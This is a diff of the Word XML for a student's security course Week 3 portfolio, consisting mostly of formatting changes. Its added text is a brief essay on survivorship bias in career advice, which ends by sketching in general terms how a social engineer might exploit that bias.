--- a/Portfolio/COMP6841_Week_3_z5425064.docx
+++ b/Portfolio/COMP6841_Week_3_z5425064.docx
@@ -1,109 +1,70 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" mc:Ignorable="w14 w15 wp14 w16se w16cid w16 w16cex w16sdtdh w16sdtfl">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:body>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Title"/>
-        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
         <w:jc w:val="center"/>
         <w:rPr>
-          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:caps w:val="0"/>
-          <w:smallCaps w:val="0"/>
-          <w:noProof w:val="0"/>
-          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:caps w:val="0"/>
-          <w:smallCaps w:val="0"/>
-          <w:noProof w:val="0"/>
-          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>COMP6</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:caps w:val="0"/>
-          <w:smallCaps w:val="0"/>
-          <w:noProof w:val="0"/>
-          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>8</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:caps w:val="0"/>
-          <w:smallCaps w:val="0"/>
-          <w:noProof w:val="0"/>
-          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">41 Week </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:caps w:val="0"/>
-          <w:smallCaps w:val="0"/>
-          <w:noProof w:val="0"/>
-          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>3</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:caps w:val="0"/>
-          <w:smallCaps w:val="0"/>
-          <w:noProof w:val="0"/>
-          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> Portfolio </w:t>
       </w:r>
@@ -111,133 +72,97 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:caps w:val="0"/>
-          <w:smallCaps w:val="0"/>
-          <w:noProof w:val="0"/>
-          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:caps w:val="0"/>
-          <w:smallCaps w:val="0"/>
-          <w:noProof w:val="0"/>
-          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:caps w:val="0"/>
-          <w:smallCaps w:val="0"/>
-          <w:noProof w:val="0"/>
-          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
         <w:t xml:space="preserve">Name: </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:caps w:val="0"/>
-          <w:smallCaps w:val="0"/>
-          <w:noProof w:val="0"/>
-          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:caps w:val="0"/>
-          <w:smallCaps w:val="0"/>
-          <w:noProof w:val="0"/>
-          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>zID:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:caps w:val="0"/>
-          <w:smallCaps w:val="0"/>
-          <w:noProof w:val="0"/>
-          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:caps w:val="0"/>
-          <w:smallCaps w:val="0"/>
-          <w:noProof w:val="0"/>
-          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Thomas Gosman</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>zID</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> z5425064</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
         <w:t>Date Submitted:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:after="120" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
+        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
       </w:pPr>
     </w:p>
     <w:p>
@@ -249,14 +174,14 @@
         </w:numPr>
         <w:ind w:left="270"/>
         <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>Setup</w:t>
       </w:r>
@@ -265,12 +190,10 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="R72f24dccbaca4975">
+      <w:hyperlink r:id="rId7">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
-            <w:noProof w:val="0"/>
-            <w:lang w:val="en-US"/>
           </w:rPr>
           <w:t>Security Everywhere</w:t>
         </w:r>
@@ -283,7 +206,7 @@
         <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="9360"/>
+        <w:gridCol w:w="9350"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -292,61 +215,20 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="9360" w:type="dxa"/>
-            <w:tcMar/>
           </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-      </w:pPr>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -354,19 +236,16 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="2"/>
         </w:numPr>
-        <w:suppressLineNumbers w:val="0"/>
-        <w:spacing w:before="360" w:beforeAutospacing="off" w:after="80" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
-        <w:ind w:left="270" w:right="0" w:hanging="360"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
+        <w:ind w:left="270"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>Humans, Measuring</w:t>
       </w:r>
@@ -375,12 +254,10 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="Rfa3c7b9d170a4694">
+      <w:hyperlink r:id="rId8">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
-            <w:noProof w:val="0"/>
-            <w:lang w:val="en-US"/>
           </w:rPr>
           <w:t>Research a Cognitive Vulnerability</w:t>
         </w:r>
@@ -393,7 +270,7 @@
         <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="9360"/>
+        <w:gridCol w:w="9350"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -402,62 +279,116 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="9360" w:type="dxa"/>
-            <w:tcMar/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Normal"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Title: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Beware survivorship bias in advice on science careers</w:t>
+            </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Link: </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId9" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>https://www-nature-com.wwwproxy1.library.unsw.edu.au/articles/d41586-021-02634-z</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">The article published above explores anecdotally the survivorship bias present often in career advice. The article deduces that often advice is taken from senior members of a career path or field of research, whilst this appears wise there is an inherent biasing effect. This is because the senior members that remain will be the sample of successful people in their career as failed attempts will have either left that career path or changed their field of research. Hence often for career research we only hear from the successful side of the story rather than a balanced view. This can make us perceive that the pathway and probability of success to be more deterministic and in a </w:t>
+            </w:r>
+            <w:r>
+              <w:t>person’s</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> favour than in reality. </w:t>
+            </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
+            <w:r>
+              <w:lastRenderedPageBreak/>
+              <w:t>When applied to a</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> security context this can lead to the prediction of people’s behaviours from </w:t>
+            </w:r>
+            <w:r>
+              <w:t>their surrounding senior mentors in appealing positions to the individual (</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>e.g</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">supervisors who are working </w:t>
+            </w:r>
+            <w:r>
+              <w:t>high paying roles</w:t>
+            </w:r>
+            <w:r>
+              <w:t>/industries</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">or </w:t>
+            </w:r>
+            <w:r>
+              <w:t>relatives that have progressed in highly selective fields etc</w:t>
+            </w:r>
+            <w:r>
+              <w:t>)</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">. Due to this highly predictive bias, </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">an attacker can begin social engineering scenarios that exploit this as a vulnerability that your behaviour is in the attackers favour. For example, an attacker might infiltrate a highly admired member at a large firm within an engineering field that you have occasionally met, and then proceed to begin to send targeted ads and </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">information about this field to you for your </w:t>
+            </w:r>
+            <w:r>
+              <w:t>desire to grow. Then for them to use this professor to offer a rare opportunity that makes things easy for you .</w:t>
+            </w:r>
           </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
               <w:rPr>
-                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-                <w:noProof w:val="0"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:lang w:val="en-US"/>
+                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -466,18 +397,15 @@
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:suppressLineNumbers w:val="0"/>
-        <w:bidi w:val="0"/>
-        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
-        <w:ind w:left="0" w:right="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
-          <w:noProof w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -485,12 +413,10 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:hyperlink r:id="Rf6a502d7308e4463">
+      <w:hyperlink r:id="rId10">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
-            <w:noProof w:val="0"/>
-            <w:lang w:val="en-US"/>
           </w:rPr>
           <w:t>Enigma Machine</w:t>
         </w:r>
@@ -503,7 +429,7 @@
         <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="9360"/>
+        <w:gridCol w:w="9350"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -512,62 +438,20 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="9360" w:type="dxa"/>
-            <w:tcMar/>
           </w:tcPr>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Normal"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
